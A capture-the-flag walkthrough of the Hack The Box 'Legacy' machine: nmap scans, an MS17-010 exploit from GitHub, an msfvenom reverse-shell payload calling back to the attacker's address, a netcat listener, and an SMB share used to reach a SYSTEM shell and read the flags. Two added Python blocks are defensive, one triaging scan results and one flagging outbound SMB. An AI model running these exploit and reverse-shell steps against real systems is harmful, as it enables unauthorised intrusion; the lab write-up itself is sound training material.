Legacy – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Legacy box from Hack The Box, done without using Metasploit.

1. Initial nmap scan

nmap -T4 -p- -A -Pn -oA initial_scan 10.10.10.4

    • Legacy box IP address is 10.10.10.4
    • -T4 = Sets the timing template for the scan. The higher the number (0-5), the faster the scan, but also the less accurate. T4 is the default
    • -p- = Port scan all ports
    • -A = Enables OS detection, version detection, script scanning, and traceroute
    • -oA = Output to files in all formats, with a base name I called “initial_scan”
    • -Pn = Disable host discovery and port scan only (I was getting errors during my initial nmap scan that recommended adding this, so I did)

Ports 139, 445 and 3389 are open, and the OS is Windows XP.


2. Nmap vuln scan

nmap --script vuln -Pn -p 139,445 -oA vuln_scan 10.10.10.4

    • --script = Scan with default NSE scripts. Considered useful for discovery, and safe. I am searching for “vuln”
    • -p = Port scan for ports 139 and 445, the two ports I want to explore vulnerabilities on
    • I added -Pn again because of the ping errors from above

The victim box is vulnerable to two SMB vulnerabilities: CVE-2008-4250 (smb-vuln-ms08-067) and CVE-2017-0143 (ms17-010).
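The scan above writes its results to disk with -oA, and the .xml file is the one worth keeping, because the NSE vulns library records each script result as a structured table (a vuln id, a state such as VULNERABLE, and the CVE ids). The following is an added example, not code from the walkthrough or from nmap: a small Python parser that reads that XML and lists every host whose smb-vuln-* script reported a vulnerable state, which is what a defender needs to turn a scan into a patching list. The XML embedded in the block is constructed to follow nmap’s layout; the second host is assumed to have been scanned with --script-args vulns.showall so that its NOT VULNERABLE result is recorded too.

```python
"""Triage helper for an nmap --script vuln run (added example, not the page's code).

Reads the .xml file that -oA writes and lists every host whose smb-vuln-*
NSE script reported a VULNERABLE state, so the result can be handed to
whoever owns patching.
"""
import xml.etree.ElementTree as ET  # use defusedxml for scan files you did not produce yourself

# Constructed sample modelled on nmap's XML layout (elements not used here are
# trimmed). The second host is assumed to have been scanned with
# --script-args vulns.showall so that a NOT VULNERABLE result is still recorded.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap --script vuln -Pn -p 139,445 -oA vuln_scan 10.10.10.4">
<host><status state="up" reason="user-set"/>
<address addr="10.10.10.4" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
</ports>
<hostscript>
<script id="smb-vuln-ms17-010" output="VULNERABLE (see table)">
<table key="CVE-2017-0143">
<elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
<elem key="state">VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
</table>
</script>
<script id="smb-vuln-ms08-067" output="VULNERABLE (see table)">
<table key="CVE-2008-4250">
<elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
<elem key="state">VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2008-4250</elem></table>
</table>
</script>
</hostscript>
</host>
<host><status state="up" reason="user-set"/>
<address addr="10.10.10.5" addrtype="ipv4"/>
<hostscript>
<script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
<table key="CVE-2017-0143">
<elem key="state">NOT VULNERABLE</elem>
</table>
</script>
</hostscript>
</host>
</nmaprun>
"""

# State prefixes the NSE vulns library uses for a positive result
# ("VULNERABLE", "VULNERABLE (Exploitable)", "LIKELY VULNERABLE", ...).
VULN_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


def parse_vuln_scan(xml_text):
    """Return one finding dict per (host, script, vuln id) in a vulnerable state."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = sorted(
            p.get("portid") for p in host.iterfind("ports/port")
            if p.find("state") is not None and p.find("state").get("state") == "open"
        )
        for script in host.iterfind("hostscript/script"):
            if not script.get("id", "").startswith("smb-vuln-"):
                continue
            for table in script.findall("table"):
                state_el = table.find("elem[@key='state']")
                state = (state_el.text or "").strip() if state_el is not None else ""
                if not state.startswith(VULN_STATES):
                    continue  # NOT VULNERABLE, UNKNOWN, or no state recorded
                title_el = table.find("elem[@key='title']")
                # ids are stored as "CVE:CVE-2017-0143"; keep the part after the prefix
                ids = [e.text.split(":", 1)[-1]
                       for e in table.iterfind("table[@key='ids']/elem") if e.text]
                findings.append({
                    "ip": addr.get("addr"),
                    "script": script.get("id"),
                    "vuln": table.get("key"),
                    "state": state,
                    "title": title_el.text if title_el is not None else "",
                    "ids": ids,
                    "open_ports": open_ports,
                })
    return sorted(findings, key=lambda f: (f["ip"], f["vuln"]))


def hosts_to_patch(findings):
    """Collapse findings into {ip: sorted CVE list} for a remediation ticket."""
    out = {}
    for f in findings:
        out.setdefault(f["ip"], set()).update(f["ids"])
    return {ip: sorted(cves) for ip, cves in out.items()}


if __name__ == "__main__":
    for f in parse_vuln_scan(SAMPLE_XML):
        print(f"{f['ip']:<12} {f['script']:<22} {f['state']:<10} {','.join(f['ids'])}")
    print(hosts_to_patch(parse_vuln_scan(SAMPLE_XML)))
```

Point parse_vuln_scan at the text of vuln_scan.xml instead of SAMPLE_XML to use it on a real run; the same structure applies to any NSE script built on the vulns library, so the smb-vuln- prefix filter is the only SMB-specific part.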


3. Searchsploit

searchsploit ms17-010

    • Searchsploit = command-line search tool for Exploit-DB that is included in Kali. I’m using it to search for any exploits for ms17-010 that I can grab locally.
    • Anything ending in .rb will most likely be a Metasploit module, so I skip those. I also don’t see anything that mentions Windows XP, so I will head to Google to see what else I can find.


4. Google


5. Download exploit from github

git clone https://github.com/helviojunior/MS17-010

    • Navigate to the MS17-010 directory on your box. The exploit we will be using is the send_and_execute.py script.
    • If you take a look at the script, you can see at the top that it needs the mysmb and impacket libraries: https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
    • Install mysmb in that same MS17-010 directory. You can get it from: https://github.com/worawit/MS17-010/blob/master/mysmb.py
    • Install impacket in that directory as well. Git clone the repository from https://github.com/SecureAuthCorp/impacket, then run: pip install impacket

git clone https://github.com/SecureAuthCorp/impacket

pip install impacket

    • Double check what your host IP address is by running ip addr
    • Since you are on the HTB VPN, your IP address will be the one on the “tun0” interface (think “tunnel”)


6. Generate payload

    • Still in the MS17-010 directory, make the send_and_execute.py script executable:

chmod +x send_and_execute.py

    • In the same directory, create a reverse shell payload using msfvenom
      • Msfvenom is the command-line payload generator that ships with Metasploit and can be used to generate shellcode. We can use it here to generate our custom reverse shell payload, which we will then pass to our exploit.
      • Note: Msfvenom is allowed on the OSCP exam. If you’re doing the OSCP exam, stick to standard reverse shell payloads, not Meterpreter ones. Meterpreter is forbidden on the OSCP exam.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse-shell.exe

    • -p = payload (in this case it will be a windows reverse tcp shell)
      • A reverse shell (also known as a connect-back) requires the attacker to set up a listener first on their box. Then the victim machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
    • LHOST = IP address of your host machine that will be doing the attack
    • LPORT = Any port you wish to assign to the listener (I try to stick to larger numbers)
    • EXITFUNC = Sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
      • There are 4 different values for EXITFUNC: none, seh, thread and process. Usually it is set to thread or process, which correspond to the ExitThread or ExitProcess calls. The “none” technique calls GetLastError, effectively a no-op. The thread then continues executing, allowing you to simply cat multiple payloads together to be run in serial.
      • EXITFUNC will be useful in some cases where, after you have exploited a box, you need a clean exit
        • SEH: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.
        • THREAD: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit).
        • PROCESS: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.
    • -f = format (in our case exe)
    • -a = architecture
    • --platform = the platform of the payload
    • -o = output to a file (which I’ve named reverse-shell.exe)


7. Open up a netcat listener

    • In a new terminal window, open up a netcat listener for the victim machine to connect back to.
    • Use the same port that you set as the LPORT when you created your payload in the previous step. I used 4444.

nc -nlvp 4444


8. Run the exploit and create a reverse shell on the victim box

python send_and_execute.py 10.10.10.4 reverse-shell.exe

    • send_and_execute.py = the original script we downloaded from GitHub
    • 10.10.10.4 = victim box
    • reverse-shell.exe = the payload we generated with msfvenom

Don’t worry about the “connection with remote host timed out” message. It should still be working. Back on your netcat listener terminal window, if everything has worked, you should see a reverse shell being created that gives you direct access to the victim box.

I tried running whoami on the victim box (this prints the username of the current user). Unfortunately, it did not work, so I will need to use the one I have on my own host machine.


9. Set up SMB server so victim box can access my own whoami.exe

    • In another terminal window I navigated to my root folder and searched for whoami.exe

locate whoami.exe

    • Then I searched for smbserver (comes with Kali by default)

locate smbserver

    • Make yourself root, then run the smbserver Python script. In the command below I started with “python”, then gave the path where smbserver.py was found. Then I created a name for the share I wanted to make (legacytemp), and then I gave the path that I wanted to share (in this case, the directory that whoami.exe is found in)

python /usr/share/doc/python3-impacket/examples/smbserver.py legacytemp /usr/share/windows-resources/binaries/
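What makes this step work is a Windows host opening an outbound SMB session to whatever machine is serving the share. On a monitored network that is a recognisable event: a server connecting to port 445 or 139 on a host that is not one of its approved file servers, and in the worst case on an address outside the network entirely. The block below is an added example, not part of the walkthrough or of any tool it uses: it parses constructed firewall log lines in a simple “time action proto src:port -> dst:port” format and flags SMB connections whose destination is not on an allow-list. The allow-list, the internal address range, and the log format are all assumptions chosen for the example.

```python
"""Added detection example (not the page's code): find SMB sessions that a host
initiates toward anything other than an approved file server.

The log format, the KNOWN_FILE_SERVERS allow-list and the INTERNAL_NETS range are
assumptions for this example; adapt them to the logs you actually have.
"""
import ipaddress
import re

# Constructed log lines: "<time> <action> <proto> <src>:<port> -> <dst>:<port>".
SAMPLE_LOG = """\
2024-03-01T12:00:01Z allow tcp 10.10.10.4:1040 -> 10.10.10.20:445
2024-03-01T12:00:05Z allow tcp 10.10.10.4:1041 -> 10.10.14.21:445
2024-03-01T12:00:09Z allow tcp 10.10.10.7:49211 -> 203.0.113.9:445
2024-03-01T12:00:12Z allow tcp 10.10.10.8:50000 -> 10.10.10.20:443
2024-03-01T12:00:15Z deny tcp 10.10.10.4:1042 -> 10.10.14.21:139
"""

# Assumed environment facts: the approved file servers and the internal ranges.
KNOWN_FILE_SERVERS = {"10.10.10.20"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
SMB_PORTS = {139, 445}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Split one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(ip):
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_unexpected_smb(log_text, file_servers=KNOWN_FILE_SERVERS):
    """Return alerts for SMB connections whose destination is not an approved file server.

    Severity is 'high' when the destination is outside the internal ranges (a
    share being reached across the network boundary) and 'medium' for an
    unknown internal host. Denied connections are still reported, because the
    attempt itself is the signal.
    """
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["dport"] not in SMB_PORTS:
            continue
        if rec["dst"] in file_servers:
            continue  # expected traffic to an approved file server
        severity = "medium" if is_internal(rec["dst"]) else "high"
        alerts.append({
            "ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
            "dport": rec["dport"], "action": rec["action"], "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for a in flag_unexpected_smb(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['ts']} {a['src']} -> {a['dst']}:{a['dport']} ({a['action']})")
```

On the sample data the connection to the approved server and the HTTPS connection are ignored, the two sessions toward the unknown internal host are reported as medium, and the one toward a public address as high. Feeding the function a second allow-list (for example one that also includes a backup server) is enough to tune it without touching the parsing.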


10. Execute whoami.exe and find flags

    • In the terminal window for your reverse shell, access the share you created in step 9 and run whoami.exe
    • You will see you’re NT AUTHORITY\SYSTEM, which is essentially root

\\10.10.14.21\legacytemp\whoami.exe

    • Navigate to C:\ and search for the directories that hold the user and root flag files. Then open the files to grab the flags.

cd ..

dir user.txt

type user.txt

dir root.txt

type root.txt
